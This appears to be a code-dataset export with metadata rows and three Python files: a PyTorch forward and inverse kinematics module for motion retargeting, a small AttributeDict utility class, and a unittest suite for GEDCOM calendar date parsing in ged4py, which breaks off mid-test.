| 35.554455 | 114 | 0.634085 | 452 | 3,591 | 4.889381 | 0.292035 | 0.032579 | 0.038462 | 0.01086 | 0.184163 | 0.175113 | 0.158371 | 0.133937 | 0.133937 | 0.133937 | 0 | 0.021708 | 0.217488 | 3,591 | 101 | 115 | 35.554455 | 0.764769 | 0 | 0 | 0.109756 | 0 | 0 | 0.190145 | 0.076837 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0.073171 | 0.146341 | 0 | 0.292683 | 0.073171 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7cdd5ddf7b7d2568fd208a60927251ae8e3ac857
| 10,399 |
py
|
Python
|
retargeting/models/Kinematics.py
|
yujiatay/deep-motion-editing
|
0a6fc5fd20059c5074f68a452cd49cf6ede36ea8
|
[
"BSD-2-Clause"
] | 1 |
2021-07-06T14:34:12.000Z
|
2021-07-06T14:34:12.000Z
|
retargeting/models/Kinematics.py
|
bmd080/deep-motion-editing
|
19604abdc0ead66f8c82d9211b8c5862c6a68089
|
[
"BSD-2-Clause"
] | null | null | null |
retargeting/models/Kinematics.py
|
bmd080/deep-motion-editing
|
19604abdc0ead66f8c82d9211b8c5862c6a68089
|
[
"BSD-2-Clause"
] | null | null | null |
import torch
import torch.nn as nn
import numpy as np
import math
class ForwardKinematics:
def __init__(self, args, edges):
self.topology = [-1] * (len(edges) + 1)
self.rotation_map = []
for i, edge in enumerate(edges):
self.topology[edge[1]] = edge[0]
self.rotation_map.append(edge[1])
self.world = args.fk_world
self.pos_repr = args.pos_repr
self.quater = args.rotation == 'quaternion'
def forward_from_raw(self, raw, offset, world=None, quater=None):
if world is None: world = self.world
if quater is None: quater = self.quater
if self.pos_repr == '3d':
position = raw[:, -3:, :]
rotation = raw[:, :-3, :]
elif self.pos_repr == '4d':
            raise Exception('Not supported')
if quater:
rotation = rotation.reshape((rotation.shape[0], -1, 4, rotation.shape[-1]))
identity = torch.tensor((1, 0, 0, 0), dtype=torch.float, device=raw.device)
else:
rotation = rotation.reshape((rotation.shape[0], -1, 3, rotation.shape[-1]))
identity = torch.zeros((3, ), dtype=torch.float, device=raw.device)
identity = identity.reshape((1, 1, -1, 1))
new_shape = list(rotation.shape)
new_shape[1] += 1
new_shape[2] = 1
rotation_final = identity.repeat(new_shape)
for i, j in enumerate(self.rotation_map):
rotation_final[:, j, :, :] = rotation[:, i, :, :]
return self.forward(rotation_final, position, offset, world=world, quater=quater)
'''
rotation should have shape batch_size * Joint_num * (3/4) * Time
position should have shape batch_size * 3 * Time
offset should have shape batch_size * Joint_num * 3
output have shape batch_size * Time * Joint_num * 3
'''
def forward(self, rotation: torch.Tensor, position: torch.Tensor, offset: torch.Tensor, order='xyz', quater=False, world=True):
if not quater and rotation.shape[-2] != 3: raise Exception('Unexpected shape of rotation')
if quater and rotation.shape[-2] != 4: raise Exception('Unexpected shape of rotation')
rotation = rotation.permute(0, 3, 1, 2)
position = position.permute(0, 2, 1)
result = torch.empty(rotation.shape[:-1] + (3, ), device=position.device)
norm = torch.norm(rotation, dim=-1, keepdim=True)
#norm[norm < 1e-10] = 1
rotation = rotation / norm
if quater:
transform = self.transform_from_quaternion(rotation)
else:
transform = self.transform_from_euler(rotation, order)
offset = offset.reshape((-1, 1, offset.shape[-2], offset.shape[-1], 1))
result[..., 0, :] = position
for i, pi in enumerate(self.topology):
if pi == -1:
assert i == 0
continue
transform[..., i, :, :] = torch.matmul(transform[..., pi, :, :], transform[..., i, :, :])
result[..., i, :] = torch.matmul(transform[..., i, :, :], offset[..., i, :, :]).squeeze()
if world: result[..., i, :] += result[..., pi, :]
return result
def from_local_to_world(self, res: torch.Tensor):
res = res.clone()
for i, pi in enumerate(self.topology):
if pi == 0 or pi == -1:
continue
res[..., i, :] += res[..., pi, :]
return res
@staticmethod
def transform_from_euler(rotation, order):
rotation = rotation / 180 * math.pi
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 1], order[1]),
ForwardKinematics.transform_from_axis(rotation[..., 2], order[2]))
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 0], order[0]), transform)
return transform
@staticmethod
def transform_from_axis(euler, axis):
transform = torch.empty(euler.shape[0:3] + (3, 3), device=euler.device)
cos = torch.cos(euler)
sin = torch.sin(euler)
cord = ord(axis) - ord('x')
transform[..., cord, :] = transform[..., :, cord] = 0
transform[..., cord, cord] = 1
if axis == 'x':
transform[..., 1, 1] = transform[..., 2, 2] = cos
transform[..., 1, 2] = -sin
transform[..., 2, 1] = sin
if axis == 'y':
transform[..., 0, 0] = transform[..., 2, 2] = cos
transform[..., 0, 2] = sin
transform[..., 2, 0] = -sin
if axis == 'z':
transform[..., 0, 0] = transform[..., 1, 1] = cos
transform[..., 0, 1] = -sin
transform[..., 1, 0] = sin
return transform
@staticmethod
def transform_from_quaternion(quater: torch.Tensor):
qw = quater[..., 0]
qx = quater[..., 1]
qy = quater[..., 2]
qz = quater[..., 3]
x2 = qx + qx
y2 = qy + qy
z2 = qz + qz
xx = qx * x2
yy = qy * y2
wx = qw * x2
xy = qx * y2
yz = qy * z2
wy = qw * y2
xz = qx * z2
zz = qz * z2
wz = qw * z2
m = torch.empty(quater.shape[:-1] + (3, 3), device=quater.device)
m[..., 0, 0] = 1.0 - (yy + zz)
m[..., 0, 1] = xy - wz
m[..., 0, 2] = xz + wy
m[..., 1, 0] = xy + wz
m[..., 1, 1] = 1.0 - (xx + zz)
m[..., 1, 2] = yz - wx
m[..., 2, 0] = xz - wy
m[..., 2, 1] = yz + wx
m[..., 2, 2] = 1.0 - (xx + yy)
return m
class InverseKinematics:
def __init__(self, rotations: torch.Tensor, positions: torch.Tensor, offset, parents, constrains):
self.rotations = rotations
self.rotations.requires_grad_(True)
self.position = positions
self.position.requires_grad_(True)
self.parents = parents
self.offset = offset
self.constrains = constrains
self.optimizer = torch.optim.Adam([self.position, self.rotations], lr=1e-3, betas=(0.9, 0.999))
self.crit = nn.MSELoss()
def step(self):
self.optimizer.zero_grad()
glb = self.forward(self.rotations, self.position, self.offset, order='', quater=True, world=True)
loss = self.crit(glb, self.constrains)
loss.backward()
self.optimizer.step()
self.glb = glb
return loss.item()
def tloss(self, time):
return self.crit(self.glb[time, :], self.constrains[time, :])
def all_loss(self):
res = [self.tloss(t).detach().numpy() for t in range(self.constrains.shape[0])]
return np.array(res)
'''
rotation should have shape batch_size * Joint_num * (3/4) * Time
position should have shape batch_size * 3 * Time
offset should have shape batch_size * Joint_num * 3
output have shape batch_size * Time * Joint_num * 3
'''
def forward(self, rotation: torch.Tensor, position: torch.Tensor, offset: torch.Tensor, order='xyz', quater=False,
world=True):
'''
if not quater and rotation.shape[-2] != 3: raise Exception('Unexpected shape of rotation')
if quater and rotation.shape[-2] != 4: raise Exception('Unexpected shape of rotation')
rotation = rotation.permute(0, 3, 1, 2)
position = position.permute(0, 2, 1)
'''
result = torch.empty(rotation.shape[:-1] + (3,), device=position.device)
norm = torch.norm(rotation, dim=-1, keepdim=True)
rotation = rotation / norm
if quater:
transform = self.transform_from_quaternion(rotation)
else:
transform = self.transform_from_euler(rotation, order)
offset = offset.reshape((-1, 1, offset.shape[-2], offset.shape[-1], 1))
result[..., 0, :] = position
for i, pi in enumerate(self.parents):
if pi == -1:
assert i == 0
continue
result[..., i, :] = torch.matmul(transform[..., pi, :, :], offset[..., i, :, :]).squeeze()
transform[..., i, :, :] = torch.matmul(transform[..., pi, :, :], transform[..., i, :, :])
if world: result[..., i, :] += result[..., pi, :]
return result
@staticmethod
def transform_from_euler(rotation, order):
rotation = rotation / 180 * math.pi
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 1], order[1]),
ForwardKinematics.transform_from_axis(rotation[..., 2], order[2]))
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 0], order[0]), transform)
return transform
@staticmethod
def transform_from_axis(euler, axis):
transform = torch.empty(euler.shape[0:3] + (3, 3), device=euler.device)
cos = torch.cos(euler)
sin = torch.sin(euler)
cord = ord(axis) - ord('x')
transform[..., cord, :] = transform[..., :, cord] = 0
transform[..., cord, cord] = 1
if axis == 'x':
transform[..., 1, 1] = transform[..., 2, 2] = cos
transform[..., 1, 2] = -sin
transform[..., 2, 1] = sin
if axis == 'y':
transform[..., 0, 0] = transform[..., 2, 2] = cos
transform[..., 0, 2] = sin
transform[..., 2, 0] = -sin
if axis == 'z':
transform[..., 0, 0] = transform[..., 1, 1] = cos
transform[..., 0, 1] = -sin
transform[..., 1, 0] = sin
return transform
@staticmethod
def transform_from_quaternion(quater: torch.Tensor):
qw = quater[..., 0]
qx = quater[..., 1]
qy = quater[..., 2]
qz = quater[..., 3]
x2 = qx + qx
y2 = qy + qy
z2 = qz + qz
xx = qx * x2
yy = qy * y2
wx = qw * x2
xy = qx * y2
yz = qy * z2
wy = qw * y2
xz = qx * z2
zz = qz * z2
wz = qw * z2
m = torch.empty(quater.shape[:-1] + (3, 3), device=quater.device)
m[..., 0, 0] = 1.0 - (yy + zz)
m[..., 0, 1] = xy - wz
m[..., 0, 2] = xz + wy
m[..., 1, 0] = xy + wz
m[..., 1, 1] = 1.0 - (xx + zz)
m[..., 1, 2] = yz - wx
m[..., 2, 0] = xz - wy
m[..., 2, 1] = yz + wx
m[..., 2, 2] = 1.0 - (xx + yy)
return m
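# Minimal sanity-check sketch, assuming the batch * Time * Joint_num * 4
# layout documented above; the shapes below are hypothetical. The identity
# quaternion (w, x, y, z) = (1, 0, 0, 0) must map to 3x3 identity matrices.
if __name__ == '__main__':
    q = torch.zeros(2, 8, 5, 4)   # batch=2, Time=8, Joint_num=5, quaternion dim=4
    q[..., 0] = 1.0               # unit w component -> identity rotation
    m = ForwardKinematics.transform_from_quaternion(q)
    assert m.shape == (2, 8, 5, 3, 3)
    assert torch.allclose(m, torch.eye(3).expand_as(m))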
| 36.233449 | 131 | 0.521877 | 1,272 | 10,399 | 4.203616 | 0.121855 | 0.005985 | 0.020946 | 0.026931 | 0.715728 | 0.695156 | 0.683935 | 0.662615 | 0.634187 | 0.625771 | 0 | 0.036943 | 0.315415 | 10,399 | 286 | 132 | 36.36014 | 0.714145 | 0.026637 | 0 | 0.671171 | 0 | 0 | 0.009929 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 1 | 0.067568 | false | 0 | 0.018018 | 0.004505 | 0.153153 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7ce0fee58832e03db2dedb448c80880f25c203aa
| 800 |
py
|
Python
|
mppi/Utilities/AttributeDict.py
|
marcodalessandro76/MPPI
|
ad60b73270b1f376ac501d47285146f1c3af457a
|
[
"MIT"
] | 1 |
2019-05-04T09:26:36.000Z
|
2019-05-04T09:26:36.000Z
|
mppi/Utilities/AttributeDict.py
|
marcodalessandro76/MPPI
|
ad60b73270b1f376ac501d47285146f1c3af457a
|
[
"MIT"
] | null | null | null |
mppi/Utilities/AttributeDict.py
|
marcodalessandro76/MPPI
|
ad60b73270b1f376ac501d47285146f1c3af457a
|
[
"MIT"
] | null | null | null |
class AttributeDict(object):
"""
A class to convert a nested Dictionary into an object with key-values
accessibly using attribute notation (AttributeDict.attribute) instead of
key notation (Dict["key"]). This class recursively sets Dicts to objects,
allowing you to recurse down nested dicts (like: AttributeDict.attr.attr)
"""
def __init__(self, **entries):
self.add_entries(**entries)
def add_entries(self, **entries):
for key, value in entries.items():
if type(value) is dict:
self.__dict__[key] = AttributeDict(**value)
else:
self.__dict__[key] = value
def getAttributes(self):
"""
Return all the attributes of the object
"""
return self.__dict__.keys()
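# Minimal usage sketch (the dictionary contents are hypothetical) showing the
# recursive dict -> attribute conversion described in the class docstring:
if __name__ == '__main__':
    conf = AttributeDict(db={'host': 'localhost', 'port': 5432}, debug=True)
    assert conf.debug is True
    assert conf.db.host == 'localhost'
    assert sorted(conf.getAttributes()) == ['db', 'debug']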
| 34.782609 | 77 | 0.62875 | 94 | 800 | 5.159574 | 0.531915 | 0.043299 | 0.045361 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.275 | 800 | 22 | 78 | 36.363636 | 0.836207 | 0.4125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7ce3c5ddd55aea55c48d0f942c54f7645b346e45
| 24,690 |
py
|
Python
|
tests/test_date.py
|
andy-z/ged4py
|
2270bd8366174dcc98424cc6671bdaecf770fda0
|
[
"MIT"
] | 10 |
2017-07-25T22:39:34.000Z
|
2022-03-01T04:40:38.000Z
|
tests/test_date.py
|
andy-z/ged4py
|
2270bd8366174dcc98424cc6671bdaecf770fda0
|
[
"MIT"
] | 20 |
2018-03-25T10:25:40.000Z
|
2021-05-02T20:38:48.000Z
|
tests/test_date.py
|
andy-z/ged4py
|
2270bd8366174dcc98424cc6671bdaecf770fda0
|
[
"MIT"
] | 6 |
2018-04-29T12:45:34.000Z
|
2021-09-14T14:30:52.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `ged4py.date` module."""
import unittest
from ged4py.calendar import (
CalendarType, CalendarDate, FrenchDate, GregorianDate, HebrewDate, JulianDate,
CalendarDateVisitor
)
from ged4py.date import (
DateValue, DateValueAbout, DateValueAfter, DateValueBefore, DateValueCalculated,
DateValueEstimated, DateValueFrom, DateValueInterpreted, DateValuePeriod,
DateValuePhrase, DateValueRange, DateValueSimple, DateValueTo, DateValueTypes,
DateValueVisitor
)
class TestDateVisitor(CalendarDateVisitor, DateValueVisitor):
def visitGregorian(self, date):
if not isinstance(date, GregorianDate):
raise TypeError(str(type(date)))
return ("gregorian", date)
def visitJulian(self, date):
if not isinstance(date, JulianDate):
raise TypeError(str(type(date)))
return ("julian", date)
def visitHebrew(self, date):
if not isinstance(date, HebrewDate):
raise TypeError(str(type(date)))
return ("hebrew", date)
def visitFrench(self, date):
if not isinstance(date, FrenchDate):
raise TypeError(str(type(date)))
return ("french", date)
def visitSimple(self, date):
if not isinstance(date, DateValueSimple):
raise TypeError(str(type(date)))
return ("simple", date.date)
def visitPeriod(self, date):
if not isinstance(date, DateValuePeriod):
raise TypeError(str(type(date)))
return ("period", date.date1, date.date2)
def visitFrom(self, date):
if not isinstance(date, DateValueFrom):
raise TypeError(str(type(date)))
return ("from", date.date)
def visitTo(self, date):
if not isinstance(date, DateValueTo):
raise TypeError(str(type(date)))
return ("to", date.date)
def visitRange(self, date):
if not isinstance(date, DateValueRange):
raise TypeError(str(type(date)))
return ("range", date.date1, date.date2)
def visitBefore(self, date):
if not isinstance(date, DateValueBefore):
raise TypeError(str(type(date)))
return ("before", date.date)
def visitAfter(self, date):
if not isinstance(date, DateValueAfter):
raise TypeError(str(type(date)))
return ("after", date.date)
def visitAbout(self, date):
if not isinstance(date, DateValueAbout):
raise TypeError(str(type(date)))
return ("about", date.date)
def visitCalculated(self, date):
if not isinstance(date, DateValueCalculated):
raise TypeError(str(type(date)))
return ("calculated", date.date)
def visitEstimated(self, date):
if not isinstance(date, DateValueEstimated):
raise TypeError(str(type(date)))
return ("estimated", date.date)
def visitInterpreted(self, date):
if not isinstance(date, DateValueInterpreted):
raise TypeError(str(type(date)))
return ("interpreted", date.date, date.phrase)
def visitPhrase(self, date):
if not isinstance(date, DateValuePhrase):
raise TypeError(str(type(date)))
return ("phrase", date.phrase)
class TestDetailDate(unittest.TestCase):
"""Tests for `ged4py.date` module."""
def test_001_cal_date(self):
"""Test date.CalendarDate class."""
date = GregorianDate(2017, "OCT", 9)
self.assertEqual(date.year, 2017)
self.assertIsNone(date.dual_year)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "2017")
self.assertEqual(date.month, "OCT")
self.assertEqual(date.month_num, 10)
self.assertEqual(date.day, 9)
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = GregorianDate(2017, "OCT", bc=True)
self.assertEqual(date.year, 2017)
self.assertIsNone(date.dual_year)
self.assertTrue(date.bc)
self.assertEqual(date.year_str, "2017 B.C.")
self.assertEqual(date.month, "OCT")
self.assertEqual(date.month_num, 10)
self.assertIsNone(date.day)
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = GregorianDate(1699, "FEB", dual_year=1700)
self.assertEqual(date.year, 1699)
self.assertEqual(date.dual_year, 1700)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "1699/00")
self.assertEqual(date.month, "FEB")
self.assertEqual(date.month_num, 2)
self.assertIsNone(date.day)
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = HebrewDate(5000)
self.assertEqual(date.year, 5000)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "5000")
self.assertIsNone(date.month)
self.assertIsNone(date.month_num)
self.assertIsNone(date.day)
self.assertEqual(date.calendar, CalendarType.HEBREW)
date = FrenchDate(1, "FRUC", 1)
self.assertEqual(date.year, 1)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "1")
self.assertEqual(date.month, "FRUC")
self.assertEqual(date.month_num, 12)
self.assertEqual(date.day, 1)
self.assertEqual(date.calendar, CalendarType.FRENCH_R)
date = JulianDate(5, "JAN", bc=True)
self.assertEqual(date.year, 5)
self.assertTrue(date.bc)
self.assertEqual(date.year_str, "5 B.C.")
self.assertEqual(date.month, "JAN")
self.assertEqual(date.month_num, 1)
self.assertIsNone(date.day)
self.assertEqual(date.calendar, CalendarType.JULIAN)
def test_002_cal_date_key(self):
"""Test date.CalendarDate class."""
date = GregorianDate(2017, "OCT", 9)
self.assertEqual(date.key(), (2458035.5, 0))
date = GregorianDate(1699, "FEB", 1, dual_year=1700)
self.assertEqual(date.key(), (2342003.5, 0))
date = FrenchDate(2017, "VENT", bc=True)
self.assertEqual(date.key(), (1638959.5, 1))
date = HebrewDate(2017, "TSH", 22)
self.assertEqual(date.key(), (1084542.5, 0))
date = JulianDate(1000)
self.assertEqual(date.key(), (2086672.5, 1))
def test_003_cal_date_cmp(self):
"""Test date.CalendarDate class."""
self.assertTrue(GregorianDate(2016, "JAN", 1) < GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) < GregorianDate(2017, "FEB", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) < GregorianDate(2017, "JAN", 2))
self.assertTrue(GregorianDate(2017, "JAN", 1) <= GregorianDate(2017, "JAN", 2))
self.assertTrue(GregorianDate(2017, "JAN", 2) > GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 2) >= GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) == GregorianDate(2017, "JAN", 1))
self.assertTrue(GregorianDate(2017, "JAN", 1) != GregorianDate(2017, "JAN", 2))
# missing day compares as "past" the last day of month, but before next month
self.assertTrue(GregorianDate(2017, "JAN") > GregorianDate(2017, "JAN", 31))
self.assertTrue(GregorianDate(2017, "JAN") < GregorianDate(2017, "FEB", 1))
# missing month compares as "past" the last day of year, but before next year
self.assertTrue(GregorianDate(2017) > GregorianDate(2017, "DEC", 31))
self.assertTrue(GregorianDate(2017) < GregorianDate(2018, "JAN", 1))
# dual date
self.assertTrue(GregorianDate(1700, "JAN", 1) == GregorianDate(1699, "JAN", 1, dual_year=1700))
# compare Gregorian and Julian dates
self.assertTrue(GregorianDate(1582, "OCT", 15) == JulianDate(1582, "OCT", 5))
self.assertTrue(GregorianDate(1582, "OCT", 16) > JulianDate(1582, "OCT", 5))
self.assertTrue(JulianDate(1582, "OCT", 6) > GregorianDate(1582, "OCT", 15))
self.assertTrue(GregorianDate(2000, "JAN", 14) == JulianDate(2000, "JAN", 1))
# compare Gregorian and French dates
self.assertTrue(GregorianDate(1792, "SEP", 22) == FrenchDate(1, "VEND", 1))
self.assertTrue(GregorianDate(1792, "SEP", 23) > FrenchDate(1, "VEND", 1))
self.assertTrue(FrenchDate(1, "VEND", 2) > GregorianDate(1792, "SEP", 22))
self.assertTrue(GregorianDate(2020, "SEP", 21) == FrenchDate(228, "COMP", 5))
# compare Gregorian and Hebrew dates
self.assertTrue(GregorianDate(2020, "JAN", 1) == HebrewDate(5780, "SVN", 4))
def test_004_cal_date_str(self):
"""Test date.CalendarDate class."""
date = GregorianDate(2017, "OCT", 9)
self.assertEqual(str(date), "9 OCT 2017")
date = GregorianDate(2017, "OCT", bc=True)
self.assertEqual(str(date), "OCT 2017 B.C.")
date = GregorianDate(1699, "JAN", 1, dual_year=1700)
self.assertEqual(str(date), "1 JAN 1699/00")
date = HebrewDate(5000)
self.assertEqual(str(date), "@#DHEBREW@ 5000")
date = FrenchDate(1, "VEND", 1)
self.assertEqual(str(date), "@#DFRENCH R@ 1 VEND 1")
date = JulianDate(1582, "OCT", 5)
self.assertEqual(str(date), "@#DJULIAN@ 5 OCT 1582")
def test_005_cal_date_parse(self):
"""Test date.CalendarDate.parse method."""
date = CalendarDate.parse("31 MAY 2020")
self.assertIsInstance(date, GregorianDate)
self.assertEqual(date.year, 2020)
self.assertIsNone(date.dual_year)
self.assertFalse(date.bc)
self.assertEqual(date.month, "MAY")
self.assertEqual(date.month_num, 5)
self.assertEqual(date.day, 31)
self.assertEqual(date.original, "31 MAY 2020")
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = CalendarDate.parse("@#DGREGORIAN@ 10 MAR 1698/99")
self.assertIsInstance(date, GregorianDate)
self.assertEqual(date.year, 1698)
self.assertEqual(date.dual_year, 1699)
self.assertFalse(date.bc)
self.assertEqual(date.month, "MAR")
self.assertEqual(date.month_num, 3)
self.assertEqual(date.day, 10)
self.assertEqual(date.original, "@#DGREGORIAN@ 10 MAR 1698/99")
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = CalendarDate.parse("10 MAR 1699/00")
self.assertIsInstance(date, GregorianDate)
self.assertEqual(date.year, 1699)
self.assertEqual(date.dual_year, 1700)
self.assertEqual(date.original, "10 MAR 1699/00")
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = CalendarDate.parse("@#DJULIAN@ 100 B.C.")
self.assertIsInstance(date, JulianDate)
self.assertEqual(date.year, 100)
self.assertTrue(date.bc)
self.assertIsNone(date.month)
self.assertIsNone(date.month_num)
self.assertIsNone(date.day)
self.assertEqual(date.original, "@#DJULIAN@ 100 B.C.")
self.assertEqual(date.calendar, CalendarType.JULIAN)
date = CalendarDate.parse("@#DFRENCH R@ 15 GERM 0001")
self.assertIsInstance(date, FrenchDate)
self.assertEqual(date.year, 1)
self.assertFalse(date.bc)
self.assertEqual(date.month, "GERM")
self.assertEqual(date.month_num, 7)
self.assertEqual(date.day, 15)
self.assertEqual(date.original, "@#DFRENCH R@ 15 GERM 0001")
self.assertEqual(date.calendar, CalendarType.FRENCH_R)
date = CalendarDate.parse("@#DHEBREW@ 7 NSN 5000")
self.assertIsInstance(date, HebrewDate)
self.assertEqual(date.year, 5000)
self.assertFalse(date.bc)
self.assertEqual(date.month, "NSN")
self.assertEqual(date.month_num, 8)
self.assertEqual(date.day, 7)
self.assertEqual(date.original, "@#DHEBREW@ 7 NSN 5000")
self.assertEqual(date.calendar, CalendarType.HEBREW)
# cannot handle ROMAN
with self.assertRaises(ValueError):
date = CalendarDate.parse("@#DROMAN@ 2020")
# cannot handle UNKNOWN
with self.assertRaises(ValueError):
date = CalendarDate.parse("@#DUNKNOWN@ 2020")
# dual year only works for GREGORIAN
with self.assertRaises(ValueError):
date = CalendarDate.parse("@#DJULIAN@ 2020/21")
# cannot parse nonsense
with self.assertRaises(ValueError):
date = CalendarDate.parse("start of time")
def test_006_cal_date_visitor(self):
"""Test date.CalendarDate.accept method."""
visitor = TestDateVisitor()
date = GregorianDate(2017, "OCT", 9)
value = date.accept(visitor)
self.assertEqual(value, ("gregorian", date))
date = HebrewDate(5000)
value = date.accept(visitor)
self.assertEqual(value, ("hebrew", date))
date = FrenchDate(1, "VEND", 1)
value = date.accept(visitor)
self.assertEqual(value, ("french", date))
date = JulianDate(1582, "OCT", 5)
value = date.accept(visitor)
self.assertEqual(value, ("julian", date))
def test_007_cal_date_hash(self):
"""Test date.CalendarDate hash."""
self.assertEqual(hash(GregorianDate(2017, "OCT", 9)),
hash(GregorianDate(2017, "OCT", 9)))
self.assertEqual(hash(GregorianDate(2017, "OCT", 9, bc=True)),
hash(GregorianDate(2017, "OCT", 9, bc=True)))
self.assertEqual(hash(FrenchDate(1, "VEND", 1)),
hash(FrenchDate(1, "VEND", 1)))
self.assertEqual(hash(FrenchDate(1)),
hash(FrenchDate(1)))
def test_010_date_no_date(self):
"""Test date.DateValue class."""
date = DateValue.parse("not a date")
self.assertIsInstance(date, DateValuePhrase)
self.assertEqual(date.kind, DateValueTypes.PHRASE)
self.assertEqual(date.phrase, "not a date")
self.assertEqual(str(date), "(not a date)")
def test_012_date_parse_period(self):
"""Test date.DateValue class."""
date = DateValue.parse("FROM 1967")
self.assertIsInstance(date, DateValueFrom)
self.assertEqual(date.kind, DateValueTypes.FROM)
self.assertEqual(date.date, GregorianDate(1967))
self.assertEqual(str(date), "FROM 1967")
date = DateValue.parse("TO 1 JAN 2017")
self.assertIsInstance(date, DateValueTo)
self.assertEqual(date.kind, DateValueTypes.TO)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(str(date), "TO 1 JAN 2017")
date = DateValue.parse("FROM 1920 TO 2000")
self.assertIsInstance(date, DateValuePeriod)
self.assertEqual(date.kind, DateValueTypes.PERIOD)
self.assertEqual(date.date1, GregorianDate(1920))
self.assertEqual(date.date2, GregorianDate(2000))
self.assertEqual(str(date), "FROM 1920 TO 2000")
date = DateValue.parse("from mar 1920 to 1 apr 2000")
self.assertIsInstance(date, DateValuePeriod)
self.assertEqual(date.kind, DateValueTypes.PERIOD)
self.assertEqual(date.date1, GregorianDate(1920, "MAR"))
self.assertEqual(date.date2, GregorianDate(2000, "APR", 1))
self.assertEqual(str(date), "FROM MAR 1920 TO 1 APR 2000")
def test_013_date_parse_range(self):
"""Test date.DateValue class."""
date = DateValue.parse("BEF 1967B.C.")
self.assertIsInstance(date, DateValueBefore)
self.assertEqual(date.kind, DateValueTypes.BEFORE)
self.assertEqual(date.date, GregorianDate(1967, bc=True))
self.assertEqual(str(date), "BEFORE 1967 B.C.")
date = DateValue.parse("AFT 1 JAN 2017")
self.assertIsInstance(date, DateValueAfter)
self.assertEqual(date.kind, DateValueTypes.AFTER)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(str(date), "AFTER 1 JAN 2017")
date = DateValue.parse("BET @#DJULIAN@ 1600 AND 2000")
self.assertIsInstance(date, DateValueRange)
self.assertEqual(date.kind, DateValueTypes.RANGE)
self.assertEqual(date.date1, JulianDate(1600))
self.assertEqual(date.date2, GregorianDate(2000))
self.assertEqual(str(date), "BETWEEN @#DJULIAN@ 1600 AND 2000")
date = DateValue.parse("bet mar 1920 and apr 2000")
self.assertIsInstance(date, DateValueRange)
self.assertEqual(date.kind, DateValueTypes.RANGE)
self.assertEqual(date.date1, GregorianDate(1920, "MAR"))
self.assertEqual(date.date2, GregorianDate(2000, "APR"))
self.assertEqual(str(date), "BETWEEN MAR 1920 AND APR 2000")
def test_014_date_parse_approx(self):
"""Test date.DateValue class."""
dates = {"500 B.C.": GregorianDate(500, bc=True),
"JAN 2017": GregorianDate(2017, "JAN"),
"31 JAN 2017": GregorianDate(2017, "JAN", 31)}
approx = [
("ABT", "ABOUT", DateValueAbout, DateValueTypes.ABOUT),
("CAL", "CALCULATED", DateValueCalculated, DateValueTypes.CALCULATED),
("EST", "ESTIMATED", DateValueEstimated, DateValueTypes.ESTIMATED)
]
for appr, fmt, klass, typeEnum in approx:
for datestr, value in dates.items():
date = DateValue.parse(appr + " " + datestr)
self.assertIsInstance(date, klass)
self.assertEqual(date.kind, typeEnum)
self.assertEqual(str(date), fmt + " " + datestr)
self.assertEqual(date.date, value)
def test_015_date_parse_phrase(self):
"""Test date.DateValue class."""
date = DateValue.parse("(some phrase)")
self.assertIsInstance(date, DateValuePhrase)
self.assertEqual(date.kind, DateValueTypes.PHRASE)
self.assertEqual(date.phrase, "some phrase")
date = DateValue.parse("INT 1967 B.C. (some phrase)")
self.assertIsInstance(date, DateValueInterpreted)
self.assertEqual(date.kind, DateValueTypes.INTERPRETED)
self.assertEqual(date.date, GregorianDate(1967, bc=True))
self.assertEqual(date.phrase, "some phrase")
self.assertEqual(str(date), "INTERPRETED 1967 B.C. (some phrase)")
date = DateValue.parse("INT @#DGREGORIAN@ 1 JAN 2017 (some phrase)")
self.assertIsInstance(date, DateValueInterpreted)
self.assertEqual(date.kind, DateValueTypes.INTERPRETED)
self.assertEqual(date.date, GregorianDate(2017, "JAN", 1))
self.assertEqual(date.phrase, "some phrase")
self.assertEqual(str(date), "INTERPRETED 1 JAN 2017 (some phrase)")
def test_016_date_parse_simple(self):
"""Test date.DateValue class."""
